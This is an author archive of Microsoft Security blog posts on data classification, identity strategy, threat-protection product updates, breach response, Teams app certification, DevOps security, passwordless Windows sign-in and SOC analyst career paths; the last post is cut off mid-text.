Author Archives: Todd VanderArk

3 strategies for building an information protection program

Five years ago, we started on a journey to update and simplify information protection at Microsoft. We had a manual data classification process that our users didn’t use effectively and didn’t work with our data storage or database technology. We had to find ways to re-classify data and build effective tools while protecting our most important asset, customer, and employee information.

We’ve learned a lot about data protection and tools and today we’re sharing some of our best practices for:

  • Laying the groundwork for protecting information.
  • Protecting trade secrets.
  • Starting your information protection journey.

Laying the groundwork for protecting information

Identifying the location of data—The first step to creating a strategy is discovering where your data and major storage places are so you can create a data landscape. Do you have data on your endpoints? Start by looking across your organization to identify your customer data, regulatory data, and other sensitive information.

Classifying the data—Classifying data is the most important and most difficult step. At Microsoft, we used a custom three-level manual label classification process but found that no one understood how to apply them correctly. We worked with legal, HR, and other groups to identify labels that made sense for our company with a goal that they could be applied automatically.

Our objective is to ensure that our data and our customer data is handled properly, classified correctly, and is protected. We’re a global company and the General Data Protection Regulation (GDPR) is the baseline—and one of our key tenets—for how we think about our information and how we protect it. We replaced the manual classification labels with a more intuitive labeling taxonomy that better aligns with industry standards:

  • Non-Business: Data that is non-business related and doesn’t belong to Microsoft.
  • Public: Data designed for public consumption.
  • General: Business data not meant for public consumption.
  • Confidential: Sensitive business data that could cause business harm if over-shared.
  • Highly Confidential: Very sensitive business data that would certainly cause the business harm if over-shared.

Identifying and resolving old data—Before you roll out new tools, there may be old data that you need to review and resolve. For example, you may need to clean up, delete, or protect your data. When reviewing data, consider the age of the data and if anyone is still using a document. Prioritize and create rules for saving, deleting, and protecting data.

Protecting the data—You want to protect the data based on classification. Protecting customer and personal information is at the core of what we’re trying to protect at Microsoft. For smaller companies—or companies just starting to develop an information protection program—your biggest return will be finding customer data so you can protect it. Building customer trust and protecting customer information is key to an information protection program.

Protecting trade secrets

Protecting our identities is an extremely important part of the information protection journey. But what if you come across a document with trade secret information? You should probably work with the group that handles trade secrets at your company. We have a white glove program with HR where we build specific programs for specific business units. Using products like Key Vault can help protect sensitive data.

Starting your information protection journey

If you’re just starting to build an information protection program, we recommend the following three-step process:

  1. Governance, risk, and compliance—Have your legal and HR teams help you define the types of information you need to defend. Always focus on customer data and sensitive information.
  2. Education and awareness—Labels are always important because they’re foundation for identifying the difference between confidential and general business data. Use terminology that’s easy for users to understand. Train them and use tools to implement your solutions. We used education campaigns and we also built tool tips and right management service (RMS) templates into our products. For example, if I’m working in an Office experience, I might get a tool tip prompting me to classify a document as confidential. We found that 50 percent of the time, users will increase the confidentiality of the document.
  3. Tools roll out—When you’re working with tools, remember that you’re typically interacting with customer and employee information. It’s an opportunity to build trust as a company. Some of the information protection tools we use include Office 365 Information Protection and Azure Information Protection, which provides labeling functionality we can push to endpoints, as well as label and tool tips for Office documents. We also use the file share scanner and Windows Information Protection (which is still in pilot phase).

Building an information protection program is not one-size-fits-all, but if you choose classification terms, terms that are easy to understand and implement, proactively educate users, and bake information protection into existing processes to minimize impact, you can increase the success of the program.

For more information about how Microsoft has implemented these strategies, watch the IT Showcase webinar, Speaking of security: Information protection.

The post 3 strategies for building an information protection program appeared first on Microsoft Security.

5 principles driving a customer-obsessed identity strategy at Microsoft

The cloud era has fundamentally changed the way businesses must think about security. For a long time, we built security around the perimeter. But today, the boundaryless landscape demands that we start with the individual.

In our journey with customers co-designing our products and services, Microsoft has learned that our identity solutions need to do more than just support employee productivity. We have to take things further to ensure our solutions empower our customers to work more closely with their business partners and nurture deeper relationships with their customers, who want help not just securing their personal information, but also protecting their privacy. The problems our customers need to solve, and the scenarios they want enabled for the future, have shaped the design principles guiding our identity strategy.

Embrace open standards

The world of cloud and devices is inherently heterogenous. Our customers, their partners, and their customers will use many devices, apps, and services from many different vendors. The complexity of managing and securing such a mixed environment could be overwhelming if not for open standards. For example, Oauth2, OIDC, and SAML enable single sign-on across apps and clouds from multiple vendors, SCIM enables automated user provisioning, and the new standards from the FIDO alliance make signing in more secure. This is why every API and protocol Azure AD supports is based on open standards and why Microsoft is actively engaged in all the major identity standards bodies.

Offer industry-leading security

Our goal is to create an identity system that’s secure and private from the ground up. This means blocking every avenue of attack that we can. Enabling MFA reduces credential-based security breaches by more than 99 percent, but there’s still risk from people mishandling their passwords or getting tricked into handing them over. Adopting FIDO with the recently ratified WebAuthN standard makes it possible to eliminate passwords altogether, replacing them with a biometric device or a phone. If you have a Microsoft Account, you can go passwordless today. Soon, passwordless sign-in will be an option on every Microsoft platform and application, as well as for third party applications that integrate with Azure AD.

We now put the full power of the cloud behind every authentication request. Using Azure AD Conditional Access as a starting point, organizations can implement a Zero Trust security strategy that examines not only the identity of the user, but also the type and health of their device, the properties and reputation of the network they’re connecting from, the app they’re using, and the sensitivity of the data they’re trying to access. This not only makes security stronger, it also improves the user experience. For example, we can employ cloud-scale machine learning algorithms, which process trillions of signals daily, to learn each user’s common behavioral patterns and flag authentication attempts that are abnormal or high risk. This way, policies invoke MFA or other additional measures only when necessary, making the experience less interruptive to users.

Make governance easier and more automatic

Implementing strong governance strengthens security guardrails, but most customers find the task daunting. Granting access is easy. Remembering months later to remove access for each person who may have changed roles is not. Identity systems should make it easier to assign the right access to the right people, for example, by automating user access provisioning and deprovisioning based on a user role, location, and business unit. It should be easier for employees and partners to request access when they need it. And most importantly, the system should prompt administrators to review access permissions on a regular cadence or when people change roles. And all of these processes should be driven and informed by world class machine learning and AI which constantly monitor for unusual patterns and unrecognized risks.

Deliver a comprehensive solution, not building blocks

One of the key things we’ve learned from our enterprise customers is that they’re sick and tired of cobbling together identity solutions based on mix and match sets of identity building blocks acquired from a myriad of vendors. They want a holistic solution that supports all their applications and all their different identities while giving them security and control without the gaps that inevitably occur when multiple point solutions are patched together. We’ll do this by delivering a completely integrated identity and access management suite that gives them a single place to go to manage—and protect—all identities, whether they belong to employees, business partners, or customers and all of the resources, they need to access.

Give people control over their information

A holistic solution that accepts identities people bring with them is a necessary prerequisite to the vision of decentralized identity. Microsoft believes everyone has the right to own and control their digital identity—one that securely and privately stores all personal data. To achieve this vision, we need to augment existing cloud identity systems with one that individuals, organizations, and devices can own so they can control their digital identity and data. We believe a standards-based decentralized identity system can unlock a new set of experiences that empowers users and organizations to have greater control over their data—and deliver a higher degree of trust and security.

Taking the next step

Everyone in the identity division at Microsoft is passionately committed to ensuring the systems we build empower people to do their best work and live their best lives.

If one thing is clear, though, these identity initiatives are a journey. Over the coming months, we’ll invite you to participate in a series of technology previews, where your feedback will help shape how identity services will take us closer to a world without passwords, where organizations can easily manage and secure complex environments, and individuals can worry less and stop making trade-offs among ease of use, privacy, and security. Working together as an industry, we’re building a better path to security and privacy, anchored around the one constant in this fast-moving, heterogenous world—you.

The post 5 principles driving a customer-obsessed identity strategy at Microsoft appeared first on Microsoft Security.

The evolution of Microsoft Threat Protection, June update

Since our announcement of Microsoft Threat Protection at Microsoft Ignite, our goal has been to execute and deliver on our promise of helping organizations protect themselves from today’s sophisticated and complex threat landscape. As we close out our fiscal year, we’ve continued progress on developing Microsoft Threat Protection, launching new capabilities and services. Hopefully, you’ve had a chance to follow our monthly updates.

As we previously shared, Microsoft Threat Protection enables your organization to:

This month, we want to share new capabilities that are starting public previews.

Efficient remediation and response for identity threats

Presently, efficient and effective response to identity threats is crucial, and Microsoft Threat Protection is built on the industry’s most widely used and comprehensive identity security service. As more organizations adopt hybrid environments, data is spread across multiple applications, is on-premises and in the cloud, and is accessed by multiple devices (often personal devices) and users. Most organizations no longer have a defined network perimeter, making traditional security tools obsolete. Identity is the control plane that is consistent across all elements of the modern organization.

At RSA, we announced a new unified Identity Threat Investigation experience between Azure Active Directory (Azure AD) Identity Protection, Azure Advanced Threat Protection (ATP), and Microsoft Cloud App Security. This experience will go into public preview this month.

Part of the new experience is enabled through Azure AD’s new integration with Azure ATP. Also, integration between Azure AD and Microsoft Cloud App Security enables continuous monitoring of user behavior from sign-in through the entire session. Microsoft Threat Protection’s identity services leverage user behavior analytics to create a dynamic investigation priority score (Figure 1) based off signal from Azure AD, Microsoft Cloud App Security, and Azure ATP. The investigation priority is calculated by assessing security alerts, abnormal activities, and potential business and asset impact related to each user. This score can help Security Operations (SecOps) teams focus and respond to the top user threats in the organization.

Figure 1. The investigation priority view.

To learn more, read Investigating identity threats in hybrid cloud environments.

Game-changing capabilities for endpoint security

Every month, Microsoft Threat Protection detects over 5 billion endpoint threats through its Microsoft Defender ATP service. Customers have long asked us to extend our industry-leading endpoint security beyond the Windows OS. This was a major driving force for us to deliver endpoint security natively for macOS in limited preview earlier this year. We’re excited to announce that Microsoft Defender ATP for macOS is in public preview.

Microsoft Threat Protection customers who have turned on the Microsoft Defender ATP preview features can access Microsoft Defender ATP for Mac via the onboarding section in the Microsoft Defender Security Center. For more information and resources, including system requirements, prerequisites, and a list of improvements and new features, check out the Microsoft Defender ATP for Mac documentation.

To further enhance your endpoint security, “live response,” our new incident response action for SecOps teams, is currently in public preview. Today, your employees often work beyond the corporate network boundary, whether from home or while traveling. The risk for compromise is potentially higher when a user is remote. Imagine the executive who connects their laptop to hotel Wi-Fi and is compromised. With current endpoint security services, SecOps would need to wait until the executive got back to the office, leaving a high-value laptop exposed. With our new live response, SecOps teams gain instant access to a compromised machine regardless of location, as well as the ability to gather any required forensic information.

This powerful feature allows you to:

  • Gather a snapshot of connections, drivers, scheduled tasks, and services, as well as search for specific files or request file analysis to reach a verdict (clean, malicious, or suspicious).
  • Download malware files for reverse-engineering.
  • Create a tenant-level library of forensic tools like PowerShell scripts and third-party binaries that allows SecOps to gather forensic information like the MFT table, firewall logs, event logs, process memory dumps, and more.
  • Run remediation activities such as quarantine file, stop process, remove registry, remove scheduled task, and more.

To learn more, try the live response DIY or read Investigate entities on machines using live response.

Figure 2. Run remediation commands.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit the Microsoft Threat Protection webpage. Organizations, like Telit, have already transitioned to Microsoft Threat Protection and our partners are also leveraging its powerful capabilities.

Begin a trial of Microsoft Threat Protection services, which also includes our newly launched SIEM, Azure Sentinel, to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, June update appeared first on Microsoft Security.

Investigating identity threats in hybrid cloud environments

As the modern workplace transforms, the identity attack surface area is growing exponentially, across on-premises and cloud, spanning a multitude of endpoints and applications. Security Operations (SecOps) teams are challenged to monitor user activities, suspicious or otherwise, across all dimensions of the identity attack surface, using multiple security solutions that often are not connected. Because identity protection is paramount for the modern workplace, investigating identity threats requires a single experience to monitor all user activities and hunt for suspicious behaviors in order to triage users quickly.

Today, Microsoft is announcing the new identity threat investigation experience, which correlates identity alerts and activities from Azure Advanced Threat Protection (Azure ATP), Azure Active Directory (Azure AD) Identity Protection, and Microsoft Cloud App Security into a single investigation experience for security analysts and hunters alike.

Modern identity attacks leverage hybrid cloud environments as a single attack surface

The identity threat investigation experience combines user identity signals from your on-premises and cloud services to close the gap between disparate signals in your environment and leverages state-of-the-art User and Entity Behavior Analytics (UEBA) capabilities to provide a risk score and rich contextual information for each user. It empowers security analysts to prioritize their investigations and reduce investigation times, ending the need to toggle between identity security solutions. This gives your SecOps teams more time and the right information to make better decisions and actively remediate identity threats and risks.

Azure ATP provides on-premises detections and activities with abnormal behavior analytics to assist in investigating the most at-risk users. Microsoft Cloud App Security detects and alerts security analysts to the potential of sensitive data exfiltration for first- and third-party cloud apps. And Azure AD Identity Protection detects unusual sign-in information, implementing conditional access on the compromised user until the issue is resolved. Combined, these services analyze the activities and alerts, using UEBA, to determine risky behaviors and provide you with an investigation priority score to streamline incident response for compromised identities.

To further simplify your SecOps workflows, we embedded the new experience into the Cloud App Security portal, regardless of whether you’re using Microsoft Cloud App Security today. While it enriches each alert with additional information, it also allows you to easily pivot from the correlated alert timeline directly into a deeper dive investigation and hunting experience.

User investigation priority

We’re adding a new dimension to the current investigation model that is based on the number of total alerts with a new user investigation priority, which is determined by all user activities and alerts that could indicate an active advanced attack or insider threat.

To calculate the user investigation priority, each abnormal event is scored based on the user’s profile history, their peers, and the organization. Additionally, the potential business and asset impact of any given user is analyzed to determine the investigation priority score.

The new concept is included on the updated user page, which provides relevant information about who the user is, the investigation priority score, how it compares across all users within the organization, and abnormal alerts and activities of the user.

In the image below, the user’s investigation priority score of 155 puts them in the top percentile within the organization, making them a top user for a security analyst to investigate.

Identity threat investigation user page.

The score is surfaced on the main dashboard to help you get an immediate idea of which users currently represent the highest risk within your organization and should be prioritized for further investigation.

Top users by investigation priority on the main dashboard.

Improved investigation and hunting experience

Beyond signal correlation and a redesigned user page, the new identity threat investigation experience also adds new and advanced investigation capabilities specifically for Azure ATP customers, regardless of whether you choose to use Azure AD Identity Protection and or Microsoft Cloud App Security.

These capabilities include the:

  • Ability for security analysts to perform threat hunting with greater context over both cloud and on-premises resources by leveraging advanced filtering capabilities and enriched alert information.
  • Visibility and management of Azure AD user risk levels with the ability to confirm compromised user status, which changes the Azure AD user risk level to High.
  • Creation of activity policies to determine governance actions and leverage built-in automation capabilities via the native integration with Microsoft Flow to more easily triage alerts.

New threat hunting experience to analyze alerts and activities.

Get started with the public preview today

If you’re one of the many enterprise customers already using Azure ATP, Microsoft Cloud App Security, and/or Azure AD Identity Protection and want to test the new identity threat investigation experience, get started by checking out our comprehensive technical documentation.

If you’re just starting your journey, begin a trial of Microsoft Threat Protection to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

We would love your feedback! Find us on the Azure ATP Tech Community and send us your questions or feedback on the new experience.

The post Investigating identity threats in hybrid cloud environments appeared first on Microsoft Security.

How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach often involves coming up with an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that identifies when you get information, who is told about it, when are they told, and what they need do about it. We often place information into different categories to give us the opportunity to identify information and the business the chance to think things through and build the plan before there’s an actual incident.

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach and think beyond your business. In 2018, Under Armour reported that their fitness and nutrition app, MyFitnessPal, was hacked. Email and hashed passwords were stolen—affecting 150 million users. Under Armour advised customers to change the password for their app and anywhere it was used. That action demonstrated to customers that the company thought about the impact of the breach beyond their product.

Increasingly companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.

The post How to recover from a security breach appeared first on Microsoft Security.

Ensuring security of your Microsoft Teams apps with Microsoft Cloud App Security

Apps in Microsoft Teams allow you to leverage additional capabilities, enhance your experience, and make Teams work for you by adding your favorite Microsoft and third-party services.

Today, hundreds of ecosystem apps provide a great way to enhance and customize Teams, but to enable applications and services in an organization, they often need to be reviewed across a wide range of security and compliance criteria.

At Microsoft Build 2019, we announced the app certification program, which will streamline the process of gathering app information related to security, data handling, and compliance practices from our partners powered by Microsoft’s Cloud Access Security Broker and gives customers the ability to review this information in one central location.

App certification program

The goal of the app certification program is to provide customers with a reliable, unified, and publicly accessible cloud app risk assessment catalog via Microsoft AppSource and within the relevant admin portals. At the same time, we give partners the ability to work directly with Microsoft to provide the most up-to-date information about their apps’ security and compliance and certify these apps for business readiness.

In the first stage of this program, we’ll work closely with solution providers of Teams apps to ensure that the information is up to date, and allow them to self-attest their apps against more than 80 risk factors provided by Microsoft Cloud App Security, as well as leverage their security and compliance information submitted in CSA STAR.

In the future, we’ll expand this program beyond Teams to include our entire app ecosystem across Microsoft 365. We’ll also look into opportunities that would allow customers to easily identify apps that can enhance their experience in Teams, while meeting certain security and compliance requirements. A central app certification program could provide developers the ability to receive a “business ready” badge for each app and simplify the selection process for organizations.

Public risk assessment information for Teams apps.

Microsoft Cloud App Security

Microsoft Cloud App Security is a multimode Cloud Access Security Broker (CASB). It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your cloud services.

The Microsoft Cloud App Security cloud app catalog is the basis for the new certification program. Today, it includes an extensive and continuously growing catalog of more than 16,000 cloud apps that have each been assessed against more than 80 risk factors spanning security, compliance, and legal frameworks.

Risk assessment information for apps inside of Microsoft Cloud App Security.

Today, the cloud app catalog is kept updated through automated advanced data extraction, continuous analysis by the Microsoft Cloud App Security analyst team, and customer-based revision requests. Going forward, we’ll automatically update the information based on our partners’ self-attestation as they engage in the new app certification program.

The new app certification program provides a transparent way to our customers to review apps and ensure they meet internal security and compliance guidelines before approving them for use in their tenant.

This program is currently in its pilot phase. To assess and manage the risk of using Teams apps, check out the security and compliance content now available via Microsoft Docs.

Selection of the partners currently covered under the app certification program.

The post Ensuring security of your Microsoft Teams apps with Microsoft Cloud App Security appeared first on Microsoft Security.

4 best practices to help you integrate security into DevOps

Microsoft’s transition of its corporate resources to the cloud required us to rethink how we integrate security into the agile development environment. In the old process, we often worked on 6- to 12-month development cycles for internal products. The security operations team was separate from the application development team and was responsible for ensuring that applications met security requirements. There was time to troubleshoot security between the two teams. Once we shifted to a shorter development cycle, we had to compress the new process to bake security into DevOps.

Our experience has led us to adopt four best practices that guide our thinking about integrating security with DevOps:

  1. Inventory your cloud resources.
  2. Establish a governance structure for cloud services.
  3. Give DevOps accountability for security.
  4. Redefine centralized security.

This post walks you through these tenets with some advice we hope you can apply to your own organization.

Inventory your cloud resources

Cloud subscriptions are so easy to spin up that many organizations don’t have a comprehensive understanding of which teams are using which services. This makes it challenging to manage your costs and enforce security policies. If you are uncertain which services you are currently paying for, billing is good place to start.

Establish a governance structure for cloud services

Once you understand your cloud inventory, you can begin the work of making sure your investments align with your business strategies. This may mean limiting which services your organization uses to maximize the ones that will help you meet your business goals. Then, align your organization to your cloud strategy by defining a governing structure:

  • Develop business scenarios that define acceptable use and configuration of cloud resources.
  • Define architecture and patterns for the cloud services you plan to use.
  • Limit who can create new subscriptions.

Give DevOps accountability for security

The only way to effectively enforce security policies in a short development cycle is to integrate security into the application development process. Early in our evolution, we dropped security team members into application development teams to create a single team with shared goals. This revealed cultural challenges and unexamined assumptions. Initially, both the application developers and the security team expected to conduct their jobs as they had in the past. Application developers wrote code and then security operations queued up issues to address. This proved unworkable for two reasons. Security analysts were queuing up too many security tasks to fit within the cycle. The application developers were often confused because security operations underestimated how well they understood the nuances of security.

The only way to meet our goals was to shift accountability for security to the DevOps teams. We wanted application developers to try to solve security issues as part of their process. This required education, but we also implemented some practices that encouraged the team to take on that responsibility:

  • Secure DevOps Kit for Azure—The Secure DevOps Kit for Azure provides scripts that can be configured for each resource. During development and before production, DevOps can easily validate that security controls are at the right level.
  • Security scorecard—The scorecard highlights which members of the team are skilled at addressing security and encourages people to improve and collaborate with each other.
  • Penetration testing—When a red team conducts a penetration test of an application, the results typically inspire the team to take security more seriously.

Redefine centralized security

We experimented with eliminating a central security team entirely, but ultimately, we realized that we needed a centralized team to monitor the big picture and set baselines. They establish our risk tolerance and measure security controls across subscriptions. They also automate as much of the security controls as they can. This includes configuring the Secure DevOps Kit for Azure. This team also needed training to better understand the vulnerabilities of the cloud. Tabletop exercises to talk through possible attacks with red teams was one way they got up to speed.

As our evolving process suggests, our biggest challenge was shifting culture and mindset. We recommend that you take time to define roles and start with a small team. You can expect to continuously discover better ways to improve teamwork and the security of your process and your applications.

Get started

For more details on how we evolved our security process for the cloud, watch the Speaking of security: Cloud migration webinar and get the Secure DevOps Kit for Azure.

The post 4 best practices to help you integrate security into DevOps appeared first on Microsoft Security.

Advancing Windows 10 as a passwordless platform

Passwords can be frustrating, difficult to remember, and easily hacked or stolen. That’s why our vision for Windows is one of a passwordless platform—a world where users don’t have to deal with the pains of a password.

With the release of Windows 10, version 1903, we’re bringing Windows 10 closer to delivering our passwordless user and security promises, with new features that we’re excited for you to try out:

  • Adding a passwordless phone number Microsoft account to Windows.
  • Passwordless sign-in to Windows for the first time with the Microsoft Authenticator app.
  • Windows Hello certified as a FIDO2 authenticator for passwordless sign-in on the web.
  • Streamlined Windows Hello PIN recovery above the lock screen.

Figure 1. Passwordless Windows Hello sign-in to Windows 10.

Adding a passwordless phone number Microsoft account to Windows

A passwordless phone number Microsoft account is exactly what it sounds like—a Microsoft account that can be created with just your phone number in mobile Office apps like Word, OneNote, or Outlook on your iOS or Android device. It unlocks all the benefits of a Microsoft account, and most importantly, it doesn’t require a password.

Figure 2. Creating a passwordless phone number Microsoft account for Word Mobile on an iOS device.

Now for the first time ever, you can go to Settings and add a passwordless phone number Microsoft account to your device and use the Microsoft Authenticator app, or an SMS code roundtrip, to sign in for the first time—no password needed! This is enabled with an added web sign-in capability on the Windows lock screen. After that, Windows Hello is set up for an end-to-end passwordless experience.

Figure 3. Adding a Microsoft account to Windows through the Settings app.

Passwordless sign-in to Windows for the first time with the Microsoft Authenticator app

In addition to supporting passwordless phone number Microsoft account sign-in, the web sign-in capability can be used with any Microsoft account—even if it’s just a regular email account. You can try it out by adding a Microsoft account to Windows, signing in for the first time with the Microsoft Authenticator app (make sure it’s already set up for your Microsoft account), and setting up Windows Hello face, fingerprint, or PIN for later sign-ins—all without a password!

Figure 4. First time Microsoft account sign-in to Windows with the Microsoft Authenticator app.

Windows Hello certified as a FIDO2 authenticator for passwordless sign-in on the web

In November 2018, we announced the ability to use Windows Hello and FIDO2 compliant Microsoft-compatible security keys for passwordless sign-in on the web with a Microsoft account. Additionally, the FIDO Alliance recently announced that with Windows 10, version 1903, Windows Hello is a FIDO2 certified authenticator.

With this announcement, you can use Windows Hello or FIDO2 compliant Microsoft-compatible security keys for sign-in to the web on Windows 10. This is available on Mozilla Firefox version 66 and above and will soon be supported on Chromium-based browsers, including Microsoft Edge on Chromium, when signing in to a Microsoft account and other websites supporting FIDO authentication.

Figure 5. Using Windows Hello to sign in to a Microsoft account on Firefox.

To learn how to enable FIDO authentication, watch Enabling your application and services to use passwordless authentication and read Windows Hello FIDO2 certification gets you closer to passwordless.

Streamlined Windows Hello PIN recovery above the lock screen

We know that users occasionally forget their Windows Hello PIN, so we wanted to provide our Microsoft account users with a revamped “I forgot my PIN” experience above the Windows lock screen with the same look and feel as signing in on the web. Just like first time sign-in, you can use the Microsoft Authenticator app instead of a password to reset your PIN when signing in.

Figure 6: Streamlined Windows Hello PIN recovery experience above lock.

Let us know what you think

While there’s still a ways to go in our passwordless platform journey, we’re excited for you to try these new features and let us know what you think. Comments, questions, and feedback are all welcome! You can reach out to us at or by posting in the Windows 10 Feedback Hub app.

The post Advancing Windows 10 as a passwordless platform appeared first on Microsoft Security.

Lessons learned from the Microsoft SOC Part 2b: Career paths and readiness

The “Lessons learned from the Microsoft SOC” blog series is designed to share our approach and experience with security operations center (SOC) operations, so you can use what we learned to improve your SOC. The learnings in the series come primarily from Microsoft’s corporate IT security operation team, one of several specialized teams in the Microsoft Cyber Defense Operations Center (CDOC). We’ve also included lessons our Detection and Response Team (DART) have learned helping our customers respond to major incidents and insights from the other internal SOC teams.

Today, we wrap up our discussion on people—our most valuable resource in the SOC. In the first part of our discussion, Part 2a: Organizing people, we covered how to set up people in the security operations center (SOC) for success. Today, we talk about our investments into readiness programs and career paths for our SOC analysts as well as recruiting for success. We’ll close the series with discussions about the technology that enables our people to accomplish their mission.

Something new every day

When an analyst walks into our SOC for a shift, they never know what to expect. They must be ready for anything as they face off with intelligent, adaptable, and well-funded adversaries who are intent on evading our defenses. For each problem, they must apply their unique knowledge and experience, the accumulated learnings from our SOC, and the expertise of their SOC teammates.

Our investments into readiness programs, career paths, and recruitment strategies are designed so our SOC analysts are prepared to succeed in their duties, increase mastery of their discipline, and grow as individuals. This ensures that our SOC staff brings their best to every shift, every time.

You may have to adapt some of these practices to the unique needs of your security operations team to be successful. We’re fortunate to have dedicated security operations teams, dedicated facilities, and experienced peers to learn from already on staff, but understand not all security organizations have these resources available.

Analyst roles and career paths

Empowering humans means investing in them. A SOC analyst is a high stress job and we know our success is built upon actively engaged people applying their experience and problem solving creativity. The longer our analysts do this work the better they get, so it’s important to nurture a long-running, sustainable workforce. This starts by clearly defining a career path. Our tier model not only organizes the work of the SOC, but also guides our analysts in building their knowledge and skills and shapes their careers with increasing levels of skills and different challenges.

Because we strive to empower and attract smart people with a continuous learning mindset, we’re motivated to promote from within. An analyst’s career path typically progresses from Tier 1 to Tier 2 to Tier 3 or to incident response, program management, security product engineering, or leadership tracks. There are exceptions, but this tends to be the norm.

  • Tier 1—Analysts acquire and refine core skills including attacker mindset and techniques, using detection and investigation tools, working with internal teams and processes, and calmly applying a thoughtful approach in a high pressure situation. This is similar to martial arts where beginners acquire basic competencies (marked by a progression of colored belts) until they have achieved their black belt and move to the next stage of skills. Similarly, transition from Tier 1 to Tier 2 is a key turning point in the career of an analyst.
  • Tier 2—Analysts continue to hone their skills as they move from executing well-defined playbooks for (mostly) predictable incidents at Tier 1 to investigating advanced incidents with greater unpredictability. Tier 2 analysts investigate attack operations conducted by organized groups with specialized skills and a specific targeted goal. Analysts investigating these incidents continue growing skills while learning from Tier 2 peer analysts and the incidents themselves. Over time, senior Tier 2 analysts often shadow different Tier 3 teams as they try out potential career paths and/or prepare for the next stage of their career.
  • Tier 3—At this level, the analyst career paths typically start to diverge more into deeper specialties. Analysts can choose to pursue mastery of a particular skill or increasing competency/mastery across multiple skills. Tier 3 is increasingly requiring more data analytic skillsets on the team. This is because proactive hunting, investigation of advanced attacks, and automation development frequently require navigating many datasets with massive amounts of information.

Careful balancing

Defining a clear career path is important, but like all disciplines dealing with people, we must carefully balance and manage some nuances along the way.

  • Balancing short and long term goals—As our analysts learn new skills and progress through their career, they learn to balance goals, such as ensuring alerts and cases are handled as top priority while simultaneously developing creative solutions that can reduce toil and increase efficiency over the long term.
  • Balancing empowerment and guidance—Managers and senior personnel need to strike this careful balance as they mentor analysts in their career. This is particularly important for key transition points like when an analyst first begins onboarding a new role. Much like we see in many marital arts films when the talented but “not fully trained” student has an overabundance of confidence and tries to take on more than they can handle, we see a similar dynamic as analysts begin shadowing Tier 3 roles. In this situation, we have to be careful not to discourage this creative impulse (offering a feedback channel for ideas) while coaching and guiding analysts to complete their learning from seasoned professionals and focusing on the journey ahead.

Recruiting for success

Recruiting people and developing their skills is one of the most critical aspects of the SOC’s success. The biggest challenges in this space are the scarcity of people with the right skillsets, the speed at which skillsets must evolve, the potential for analyst burnout, and the need to blend diverse skills and perspectives to address both the human and technical aspects of attacks.

Much has been written about the scarcity of cybersecurity skills. We recommend reading a relevant blog on this topic that offers different ways of addressing the scarcity of talent in security. Additionally, you may want to watch a recent RSA Conference Keynote from Ann Johnson (Corporate Vice President of Cybersecurity Solutions Group at Microsoft), which addresses many related topics including the mental health and burnout risks our industry faces.

The evolving skillset challenge is particularly acute for our SOC because classic SOCs tend to be network centric, but our detection and investigation have evolved to rely primarily on device, identity, and application specific tooling. While we still have and use advanced network security tools, we’ve seen the utility of these network tools diminish significantly over the years to supporting investigation and advanced hunting. As of the writing of this blog, it’s been over two years since the last primary detection of an attack on our corporate environment came in from a network tool. We expect this trend to continue and have oriented our analyst readiness accordingly.

When it comes to recruiting and building skilled analysts, we’ve found that we require a combination of diverse perspectives and some common traits. As with any role, success requires having a diverse team with different backgrounds, mindsets, and skillsets to bring more perspective to the problems at hand and surface better solutions faster. We’ve also found certain personality traits tend to make analysts more successful in a fast-paced high-pressure work environment of a SOC.

Its critical to note that the following observations are general trends and not absolute rules. The primary factor of success in hiring an individual into a role is most heavily reliant upon that particular person and how well they fit that role. With that said, we tend to look for people with a kind of “grace under pressure” as we find it’s easier to train technical and security skills to people with a growth mindset and calm demeanor under pressure than it is to do the reverse.

